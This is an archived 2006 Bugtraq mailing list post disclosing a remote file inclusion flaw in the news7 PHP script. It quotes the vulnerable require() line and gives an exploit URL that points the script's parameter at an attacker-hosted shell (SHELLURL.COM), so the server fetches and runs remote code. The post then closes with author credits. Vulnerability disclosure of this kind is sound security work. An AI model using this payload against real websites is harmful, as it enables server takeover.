lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 13 Oct 2006 00:27:43 -0000 From: xp1o@....com To: bugtraq@...urityfocus.com Subject: news7 <= (news.php) Remote File Inclusion Exploit #======================================================================= news7 <= (news.php) Remote File Inclusion Exploit ======================= ##======================================================================= ======================== #Bug in :news.php # # #Vlu Code : #-------------------------------- # #require($news7["functions"]); # # #======================================================================= ========================= # #Exploit : #-------------------------------- # #htpp://sitename.com/[scerpitPath]/index.php?news7["functions"]=http://SHELLURL.COM # # # #======================================================================= ========================= #Discoverd By : MoHaNdKo # #Conatact : xp1o (at) msn (dot) com [email concealed] #or # # wWw.xP10.CoM & wWw.TRyaG.CoM # #Greetz :ToOoFA &( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA & abu shad & v1per-haCker & MR.WOLF & # #abu melaf & mohagr22 & metoovet & fuck_net & hitler-jeddah & El3alMy & # # # and all member on xp10.com and tryag.com and lezr.com ======================================================================== ========================== vendor: http://www.n7studios.co.uk/work/programs/news7.zip